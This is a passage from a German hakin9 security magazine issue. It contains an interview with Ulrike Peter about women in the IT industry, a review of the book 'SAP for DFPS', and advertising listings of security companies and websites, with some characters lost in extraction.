zen“ in beide Richtungen mehr und mehr verschwimmen.<br />
Denn auch Männer finden wir heute in Berufen,<br />
die vor Jahren ausschließlich Frauen zugeordnet wurden.<br />
Und wir sind zwar von elektronischen Geräten wie<br />
PCs, Smartphones etc. umgeben und diese werden<br />
auch rege von beiden Geschlechtern genutzt – aber einen<br />
technischen Job zu ergreifen ist ein <strong>and</strong>eres paar<br />
Schuhe. Hierzu gehört ein besonderes Faible. Die Beweggründe,<br />
weshalb in diesem Segment Frauenmangel<br />
herrscht, sind meiner Meinung nach: Ihnen fehlt<br />
manchmal der Mut, sie erhalten nicht immer die gleichen<br />
Chancen oder – und das wird der Hauptgrund sein<br />
– es liegen schlichtweg die Interessen in <strong>and</strong>eren Bereichen.<br />
hakin9: Woraus resultieren die Vorurteile gegen die<br />
Frauen, die sich mit Computern beschäftigen?<br />
Ulrike Peter: Die IT ist (und bleibt es sicher auch) eine<br />
Männerdomäne – Frauen in der IT-Branche sind Paradiesvögel.<br />
Wie in allen Berufen, in denen seit jeher ein<br />
Geschlecht etabliert ist, sich Prozesse eingeschliffen<br />
und bewährt haben, ist es erst einmal fremd und gewöhnungsbedürftig,<br />
wenn sie sich verändern. So liegen<br />
die Vorurteile zum einen daran, dass es nicht üblich ist,<br />
wenn Frauen in diesen Berufen arbeiten und Männern<br />
die „Technik“ zugeordnet wird – zum <strong>and</strong>eren resultieren<br />
sie daraus, dass die unterschiedlichen Fähigkeiten<br />
und Interessen der Geschlechter einfach naturgegeben<br />
sind. So wie kleine Jungen mit Autos spielen und<br />
Mädchen mit Puppen, stecken auch später gewisse<br />
Verhaltensweisen und Interessen in uns, die bereits in<br />
der Kindheit geprägt werden. Greift das weibliche Geschlecht<br />
im Berufsleben plötzlich zum „Auto“, so ist dies<br />
ungewöhnlich und wird erst einmal hinterfragt.<br />
hakin9: Wie sieht die Situation von Frauen in der IT-<br />
Branche aus? Ist es leicht, <strong>als</strong> begabte IT-Expertin<br />
einen Job in einem Unternehmen zu bekommen?<br />
Ulrike Peter: Frauen in der IT-Branche sind häufig in<br />
Marketingabteilungen zu finden – aber zum Beispiel<br />
auch bei der schreibenden Zunft in Fachverlagen. In<br />
diesen Jobs herrscht in meinen Augen Chancengleichheit.<br />
Als IT-Expertin in einem technischen Beruf wie Administrator,<br />
Entwickler oder Ähnliches sieht es dagegen<br />
<strong>and</strong>ers aus. In diesem Segment haben es weibliche<br />
Fachkräfte meiner Ansicht nach schwerer. Die Hürde,<br />
zum Bewerbungsgespräch eingeladen zu werden, ist<br />
höher. Bekommt sie die Chance dazu, wird vielleicht etwas<br />
genauer hingeschaut, aber letztlich zählt die Kompetenz,<br />
die unterm Strich den entscheidenden Ausschlag<br />
geben wird.<br />
hakin9: Wie werden Frauen von Männern <strong>als</strong> ihre<br />
Mitarbeiter wahrgenommen?<br />
Ulrike Peter: Dies lässt sich nicht pauschalisieren<br />
und richtet sich zum einen nach der Einstellung des<br />
Interview mit Ulrike Peter<br />
Vorgesetzten und zum <strong>and</strong>eren nach den Fähigkeiten<br />
der Frau. Jeder Mitarbeiter, der neu eingestellt wird,<br />
steht vor der Aufgabe, sich zu beweisen – und sollte<br />
die Möglichkeit dazu erhalten. Jedoch werden Frauen<br />
in typischen Männerberufen oft kritischer beäugt<br />
und stehen länger auf dem Prüfst<strong>and</strong>. Dies passiert<br />
teils unbewusst. Auch beweisen Studien immer wieder,<br />
dass männliche Arbeitnehmer im gleichen Job<br />
mehr verdienen <strong>als</strong> weibliche. Hier macht die Gesellschaft<br />
aber eine Entwicklung durch und dies reguliert<br />
sich sicherlich zumindest ein Stück weit im Laufe der<br />
nächsten Jahre.<br />
hakin9: Was macht Ihnen am meisten Spaß bei der<br />
Arbeit in der IT-Branche?<br />
Ulrike Peter: Bevor ich mich selbständig machte, war<br />
ich bereits in einem <strong>and</strong>eren Unternehmen in der Geschäftsleitung<br />
tätig – jedoch konnte ich den Stift zum<br />
Schreiben nie aus der H<strong>and</strong> legen. Es reizt mich, immer<br />
wieder neue technologische Themen zu erkunden<br />
und dabei nicht nur an der Oberfläche zu kratzen, sondern<br />
Detailtiefe zu erlangen, um fundiert und lesenswert<br />
über ein Thema berichten zu können. Im Laufe<br />
der Jahre habe ich eine starke Affinität zur IT-Security<br />
entwickelt. Ich finde es spannend, über Sicherheitslücken,<br />
Verschlüsselungstechniken und vieles weitere<br />
zu schreiben. Darüber hinaus macht es mir großen<br />
Spaß, IT-Unternehmen durch die richtige PR-Strategie<br />
nach vorn zu bringen und entsprechende Maßnahmen<br />
in die Tat umsetzen. Beim Kennenlernen eines potenziellen<br />
Neukunden im ersten Moment manchmal hinsichtlich<br />
der technischen Fachkompetenz unterschätzt<br />
zu werden und dann schnell durch Know-how zu überzeugen,<br />
bestätigt mich immer wieder in dem, was ich<br />
tue.<br />
hakin9: Was sollte unternommen werden, um<br />
die Ressentiments von Frauen gegenüber IT-Jobs<br />
abzubauen?<br />
Ulrike Peter: Ich glaube, dem kann man bzw. Frau nur<br />
entgegenwirken, indem sie den Mut hat, ihre Interessen<br />
zu verfolgen und sie unter Beweis zu stellen. Aus Erfahrung:<br />
wenn jem<strong>and</strong> seine Fähigkeiten zeigt und engagiert<br />
an eine Sache herangeht, rückt das Geschlecht<br />
automatisch in den Hintergrund.<br />
Wir bedanken uns für das Gespräch!<br />
hakin9.org/de 45
46<br />
SAP for DFPS<br />
Implementierung<br />
und Customizing<br />
Galileo Press, Bonn 2010<br />
1. Auflage 2010<br />
Autoren:<br />
Bernhard Escherich<br />
Heinrich Pfriemer<br />
Wolfgang Ullwer<br />
Das Buch SAP for DFPS Implementierung und<br />
Customizing, basiert auf mehr <strong>als</strong> 20 Jahren Erfahrung<br />
die die Autoren insgesamt bei der Entwicklung,<br />
Implementierung, aber auch Schulung der<br />
Lösung sammeln konnten.<br />
Die über 650 Seiten vollgepacktes Wissen sollten sie<br />
nicht abschrecken dieses Buch in die H<strong>and</strong> zu nehmen.<br />
Es ist sehr gut und flüssig geschrieben. Man schafft es,<br />
sollten sie ein schneller LeserIn sein in zwei Tagen.<br />
Sie benötigen keine tiefgreifenden SAP-Kenntnisse<br />
zum Verständnis, daher ist es für Entscheider genauso<br />
geeignet wie für Projektleiter, Architekten, funktionale<br />
Mitarbeiter, Basismitarbeiter oder externe Berater.<br />
Komplexe Zusammenhänge werden sehr schön und<br />
bildhaft beschrieben, damit auch für den SAP-Laien,<br />
das Vorgehen verständlich beschrieben wird. Erwähnenswert<br />
finde ich in diesem Zusammenhang Rubiks<br />
Zauberwürfel.<br />
Das Buch ist sehr strukturiert aufgebaut und<br />
umfasst unverzichtbare Grundlagen in den Teilen I-III.<br />
Für Experten wird es dann in Teil IV richtig spannend<br />
und interessant.<br />
Die von SAP entwickelte fast eierlegende Wollmilchsau,<br />
erfordert ein umfangreiches Nachschlagewerk, zur<br />
Implementierung. Den Autoren ist dies hiermit gelungen.<br />
Ihnen ist es außerdem gelungen aufzuzeigen, wie<br />
komplexe „Unternehmensstrukturen“ bewältigt und Kosten<br />
reduziert und kontrolliert werden können.<br />
Das Beispielprojekt „Tsunami“ verdeutlicht dabei an<br />
einem nicht so komplexen Projekt die Anforderungen.<br />
Beleuchtet wird z.B. wie militärische Kernprozesse, wie<br />
etwa die Logistik substanzielle Einsparungen von ca.<br />
30% erzielen könnten, <strong>als</strong> auch die Unterstützung von<br />
Einsätzen verbessert werden könnten (Beschleunigung<br />
der Verlegung um bis zu 50 -70%).<br />
Des Weiteren wird die Interoperabilität sehr schön heraus<br />
gestellt und die integrativen Aspekte stets im Blick<br />
behalten.<br />
REZENSIONEN<br />
Hervorheben sollte man die organisatorische Flexibilität<br />
und Logistik wie das Logistic Assessment, Prozessmanagement,<br />
Qualification Management inkl. der<br />
Übernahme von Trainingsdaten, das Managementkonzept<br />
BSC (Balanced Scorcard), die Einsatzmöglichkeiten<br />
von mobilen Anwendungen für Schutzaufgaben,<br />
SOA und NCW bzw. NetFüOp mit DFPS.<br />
Der Mehrwert wird z.B. am Meldewesen der NC3A<br />
durch Automatisierung von weiten Teilen, schön heraus<br />
gearbeitet.<br />
Die ausführlichen bebilderten Beispiele, stellen eine<br />
gelungene Verbindung zwischen Theorie und Praxis<br />
bzw. Anwendung dar. In der SAP-typischen Struktur<br />
wurden die neuen und bereits erwähnten Funktionen<br />
sinnvoll und gekonnt integriert.<br />
Des Weiteren findet sich für die richtige IT-Architektur<br />
ein schön gefüllter Werkzeugkasten mit den dazugehörigen<br />
Do’s <strong>and</strong> Dont’s. Natürlich darf auch das best<br />
practices nicht fehlen, sowie der Ausblick auf zukünftige<br />
Entwicklungen.<br />
Egal ob sie sich für eine Neuintegration oder eine Core2Defense<br />
Lösung entscheiden,<br />
die Kapitel zu den Themen:<br />
��� ���������������������������<br />
��� �������������������������������������<br />
��� ��������������������������������������������<br />
��� ��������������������������<br />
möchte ich ihnen unbedingt ans Herz legen.<br />
FAZIT:<br />
Dieses Buch sollte keinem Entscheider und IT-Verantwortlichen<br />
vorenthalten werden.<br />
Prädikat besonders empfehlenswert.<br />
Autor: Nicole Huck<br />
10/2010
Datenschutz ist EU-weit gesetzliche Anforderung.<br />
Wir sorgen für die Erfüllung rechtlicher<br />
Vorschriften und kümmern uns um ein angemessenes<br />
Datenschutzniveau in Ihrem Unternehmen,<br />
auch international.<br />
www.blossey-partner.de<br />
Securitymanager.de ist eine Produktion des<br />
Online-Verlag FEiG & PARTNER. Seit dem<br />
Start hat sich Securitymanager.de zu einem<br />
führenden Online-Informationsportal in<br />
Deutschl<strong>and</strong> entwickelt und versteht sich <strong>als</strong><br />
unabhängiger Informationsdienstleister der<br />
IT- und Information-Security-Branche.<br />
www.securitymanager.de<br />
Pericom base camp IT-Security: Unser Ziel ist<br />
es, unsere Kunden vor möglichen Gefahren<br />
für Ihre IT-Infrastruktur bestmöglich zu schützen.<br />
Neben der Analyse von Risikopotentialen<br />
durch Security Audits bieten wir, durch<br />
die Implementierung von Security-Lösungen,<br />
Schutz vor konkreten Gefahren.<br />
www.pericom.at<br />
Recommended Sites<br />
Die Netzwerktechnik steht auf www.easy-network.de<br />
im Mittelpunkt. Artikel, Tutori<strong>als</strong> und<br />
ein Forum bieten genügen Stoff für kommende<br />
����������������������������������<br />
www.easy-network.de<br />
Happy-Security ist ein neues Portal mit Security-Challanges,<br />
IT-Quiz, Web-Bibliothek, Multimedia-Center<br />
& vielen weiteren Features.<br />
www.happy-security.de<br />
CloudSafe stellt seinen Nutzern eine Plattform<br />
zur kryptographisch sicheren Ablage und Verwaltung<br />
von sensiblen Daten zur Verfügung: Nutzer<br />
können auf CloudSafe beliebig viele Dokumente<br />
in virtuellen Safes ablegen. Es können weiteren<br />
Personen individuelle Zugriffsrechte auf die<br />
Safes eingeräumt und somit ein sicherer Datenaustausch<br />
ermöglicht werden.<br />
www.cloudsafe.com<br />
Die Seed Forensics GmbH bietet für Strafverfolgungsbehörden<br />
professionelle Unterstützung<br />
in den Bereichen der Datensicherstellung und<br />
Datenträgerauswertung. Selbstverständlich<br />
entsprechen unsere Mitarbeiter, unser technisches<br />
Equipment und auch unsere Räumlichkeiten<br />
den notwendigen Anforderungen.<br />
www.seed-forensics.de<br />
����� ������� ��� ������� ���� ���� ����� ������<br />
Computerfreaks höher schlagen lässt: Geek<br />
Wear mit intelligenten Sprüchen, eine riesige<br />
Auswahl Gadgets und natürlich auch viele<br />
Hacker Tools.<br />
www.getDigital.de<br />
AV-Comparatives geht hervor aus dem Innsbrucker<br />
Kompetenzzentrum und gilt <strong>als</strong> eines<br />
der bekanntesten unabhängigen Testhäuser<br />
für Antiviren-Software.<br />
www.av-comparatives.org<br />
Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: de@hakin9.org
SEC Consult<br />
Recommended Companies<br />
Mabunta<br />
���� �������� ����� ������� ���� �����<br />
spezialisierter und kompetenter Partner<br />
�������������������������������������<br />
���������������������������������������<br />
heitsfragen in allen Unternehmensbereichen,<br />
verbinden Wachstum mit<br />
sicherer Kommunikation.<br />
Alles in allem- mabunta „one-face-tothe-customer“,<br />
Ihr Spezialist in Fragen<br />
������������������<br />
www.mabunta.de<br />
SEC Consult<br />
SEC Consult ist der führende Berater<br />
für Information Security Consulting in<br />
Zentraleuropa. Die vollständige Unabhängigkeit<br />
von SW- und HW-Herstellern<br />
macht uns zum echten Advisor unserer<br />
Kunden. Unsere Dienstleistungen umfassen<br />
externe/interne Sicherheitsaudits,<br />
(Web-) Applikationssicherheit (ONR 17-<br />
700), Sicherheitsmanagement-Prozesse<br />
(ISO 27001) etc.<br />
www.sec-consult.com<br />
Tele-Consulting GmbH<br />
����������������������������������������<br />
Sicherheit, hakin9 und c’t Autoren, jahrelange<br />
Erfahrung bei der Durchführung<br />
von Penetrationstests und Security-Audits,<br />
eigener Security Scanner „tajanas”,<br />
Sicherheitskonzepte, Risikoanalysen,<br />
������������������������� �� ������������<br />
ISO 27001-Auditoren, VoIP-Planung<br />
und -Security<br />
www.tele-consulting.com<br />
secXtreme GmbH<br />
schützt Ihre Web-Anwendungen bis<br />
auf Applikationsebene. Dazu gehört<br />
sowohl die Prüfung von Applikationen<br />
(Pentests und Code-Reviews) <strong>als</strong> auch<br />
Beratungsleistungen für Sicherheit im<br />
Entwicklungsprozess und Schutzlösungen<br />
(Web Application Firewalls) bei<br />
����������������������������������<br />
Mittelst<strong>and</strong>.<br />
www.sec-Xtreme.com<br />
B1 Systems<br />
Die B1 Systems ist international tätig<br />
in den Bereichen Linux/Open Source<br />
������������ ��������� ���� ��������� B1<br />
Systems spezialisiert sich in den Bereichen<br />
Virtualisierung und Cluster.<br />
info@b1-systems.de<br />
www.b1-systems.de<br />
Blossey & Partner<br />
Consulting Datenschutzbüro<br />
Datenschutz ist EU-weit gesetzliche Anforderung.<br />
Wir sorgen für die Erfüllung<br />
rechtlicher Vorschriften und kümmern<br />
uns um ein angemessenes Datenschutzniveau<br />
in Ihrem Unternehmen,<br />
auch international. Wir erledigen alle erforderlichen<br />
Aufgaben, die Fäden behalten<br />
Sie in der H<strong>and</strong>. Nutzen Sie unser<br />
Erstberatungsgespräch.<br />
www.blossey-partner.de
Recommended Companies<br />
NESEC<br />
NESEC ist Ihr Spezialist für Penetrationstests,<br />
Sicherheitsanalysen und<br />
������������ ������������� ���� ������<br />
������������� ������������ ���� ���� ���<br />
cherheitsprüfungen Ihrer Netzwerke<br />
und Webapplikationen sowie bei Source<br />
Code Audits. Bei Bedarf optimieren<br />
wir Ihre Policy, sensibilisieren Ihre<br />
������������ ���� �������������� ���� ������<br />
nehmen nach ISO 27001.<br />
www.nesec.de<br />
Seed Forensics GmbH<br />
���� ����� ���������� ����� �������<br />
für Strafverfolgungsbehörden professionelle<br />
Unterstützung in den<br />
Bereichen der Datensicherstellung<br />
und Datenträgerauswertung. Selbstverständlich<br />
entsprechen unsere<br />
Mitarbeiter, unser technisches Equip-<br />
0ment und auch unsere Räumlichkeiten<br />
den notwendigen Anforderungen.<br />
www.seed-forensics.de<br />
Protea Networks<br />
������� ���� �������������� ���� ������������<br />
Lösungen: Verschlüsselung, Firewall/<br />
����� ������������������� ��������������<br />
ring, etc. Wir bieten umfassende Beratung,<br />
Vertrieb von Security-Hard- und<br />
Software, Installation und umfangreiche<br />
�����������������������������������������<br />
nings). Protea setzt auf Lösungen der<br />
������� ���� ������������������ ���� �����<br />
dafür direkten inhouse-Support bereit.<br />
www.proteanetworks.de<br />
SecureNet GmbH, München<br />
Als Softwarehaus und Web Application<br />
Security Spezialist bieten wir Expertise<br />
rund um die Sicherheit von Webanwendungen:<br />
Anwendungs-Pentests, Sour-<br />
���������������� ������� ������� ����<br />
delines, Beratung rund um den Software<br />
�����������������������������������������<br />
Firewalls, Application Scanner, Fortify<br />
��������������������<br />
www.securenet.de<br />
m-privacy GmbH<br />
����������������������������������������<br />
einfach zu bedienen!<br />
So präsentieren sich die von m-privacy<br />
������������� ������������������� �����<br />
��������������� ���� ���������������<br />
tesiegel. Es bietet <strong>als</strong> erstes System<br />
weltweit einen kompletten Schutz vor<br />
Online-Spionage, Online-Razzien und<br />
gezielten Angriffen!<br />
www.m-privacy.de<br />
OPTIMAbit GmbH<br />
Wir sind Spezialisten für Entwicklung<br />
���� ���������� ���� �������� ������ �����<br />
und Mobile Applikationen gegen Angriffe<br />
externer und interner Art. Unsere Dienste<br />
umfassen Audits, Code Reviews,<br />
Penetrationstest, sowie die Erstellung<br />
von Policies. Zusätzlich bieten wir Semi-<br />
�������������������������������������<br />
www.optimabit.com<br />
secadm<br />
secadm ist durchtrainierter Spezialist für<br />
Airbags, ABS und Sicherheitsgurte in der<br />
���� ����� ����������������������� ���� ���<br />
Mannjahren Erfahrung beraten, entwi-<br />
������ ���� ��������������� ������������<br />
für Kunden weltweit. Der Fokus liegt da-<br />
���������������������������������������<br />
und Security-Management. Risiko-Analyse,<br />
die Sicherheitsberatung, Auditing, Security-Leitfäden,<br />
Software-Entwicklung,<br />
���������������������������<br />
www.secadm.de<br />
underground_8<br />
secure computing gmbh<br />
Wir entwickeln und vertreiben securi-<br />
��� ����������� ���� ���� ��������� ��������<br />
������� ������������ �������� ��������<br />
und Antispam. Unsere Lösungen sind<br />
hardwarebasiert und werden über Distributoren,<br />
Reseller und Systemintegratoren<br />
implementiert und vertrieben.<br />
www.underground8.com